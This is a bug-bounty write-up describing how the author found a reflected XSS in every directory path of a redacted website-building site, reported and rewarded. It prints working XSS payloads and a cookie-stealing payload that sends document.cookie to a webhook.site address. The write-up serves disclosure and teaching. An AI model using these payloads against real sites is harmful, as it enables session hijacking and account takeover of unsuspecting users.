A Tale of Reflected XSS Affecting Entire Web application

Chirag Agrawal
Techiepedia
Published in
4 min readApr 15, 2021

Hello Infosec Community,

Hope Everyone is Safe & Doing Well in this pandemic period.

WHOAMI !

I am Chirag Agrawal(a.k.a R@iders), a part time Security Researcher , I have been Researching , practicing & Learning from long time now. I am doing Bug Bounties from Six Months Now. Like every bug hunter I began my journey by reading security writeups, books ,Hackerone reports & Solving Labs.

LETS UNDERSTAND WHAT’S REFLECTED XSS FIRST !

So it’s basically happens when a user’s request is not sanitized properly & the system allows user’s input inside the code. The attacker tries to inject payloads & see where it reflects into the system within a Single HTTP Request. After understanding the scenarios , He tries to break the code & make a Payload which will execute Scripts controlled by the attacker . These is highly Dangerous as an attacker can get user’s cookies & get a valid session on behalf of him (Unauthorized access).

When a web application is vulnerable to this type of attack, it will pass unvalidated input sent through requests back to the client. The common steps to find these includes :

  1. Attacker tests for different URI , parameters & make a Exploit .
  2. After which he convinces his victims to load this URI on their browsers.
  3. As soon as the Victim Clicks on the link , the Exploit code executes into the Victim’s browser & attacker successfully gets the Victim’s Cookies into his controlled server.
  4. Now attacker replaces those cookies & gets the access to the Victim’s account.

Example of Cookies Stealing Exploitation:

For getting cookies of the person who clicks on it to your Domain you will be need a Domain which you control & have the access to it’s logs & incoming HTTP Requests , For the Proof Sake we can use webhook.site as our domain as it will be acting as our controlled server & we can use our server inside the Request so that we can get the cookie from it once someone visits.

Final Payload will look like:

“><script>alert(‘<img src=”https://webhook.site/abcded-asa-daasasada-asdaad-adad?c='+document.cookie+' ”/>’);</script> //

LETS ROLL!

I can’t Disclose the company name due to Policies , Lets call it “redacted.com”.

It was like a normal website, the main functionality was “Website building”.

Firstly I added the website in Scope & Configured my Burpsuite. After which I was manually scrolling & searching for possible Reflection on User inputs .

After many attempts , It was the case where everything was getting Encoded & sanitized properly when a user Inputs Something.

After some research , I noticed that website have several directories for different stuffs , When we search for particular directory it gets opened. As it was a directory it doesn’t have any parameter, So After some testing I thought lets try to directly break the URL current directory & try URL Based Reflected XSS,

So after which I Inserted the payloads :

“><script>alert(document.cookie);</script> //

‘;</script><script>prompt(1);</script>;//

& I got the XSS Pop Up :)

Hence , Any Path/Directory was Vulnerable to that , I tested for different Directories as well & they were all Vulnerable as well :)

Final URI :

www.redacted.com/PATH/“><script>alert(document.cookie);</script>//

IMPACT:

It ranges from user’s Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other security vulnerabilities.
By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account.
If the compromised user has elevated privileges within the application, then the impact will generally be critical, allowing the attacker to take full control of the vulnerable application and compromise all users and their data.

Proof Of Concept :

TIMELINE :

April 14 — Reported & Accepted

April 15 — Confirmation on the Patch & Rewarded me with the Bounty €€€

REFERENCES :

Thanks for your time. Regards Chirag

I believe you get something from it. If you liked it, give me a clap and follow for more updates 😁

So this will be it till next time. I will write more of my findings soon so, stay tuned for my next write-up. See you soon:)

I would like to thanks everyone who guided & motivated me into my journey !

Take care fellow hackers ,

Happy Hunting!

Connect with me on:

Linkedin : https://www.linkedin.com/in/chirag-agrawal-770488144/

Twitter : https://twitter.com/ChiragA15977205

--

--

Chirag Agrawal
Techiepedia

Smart Contract Security | Technical Writing | DevSecOps | Security Review | Penetration Testing | Building https://web3sec.news/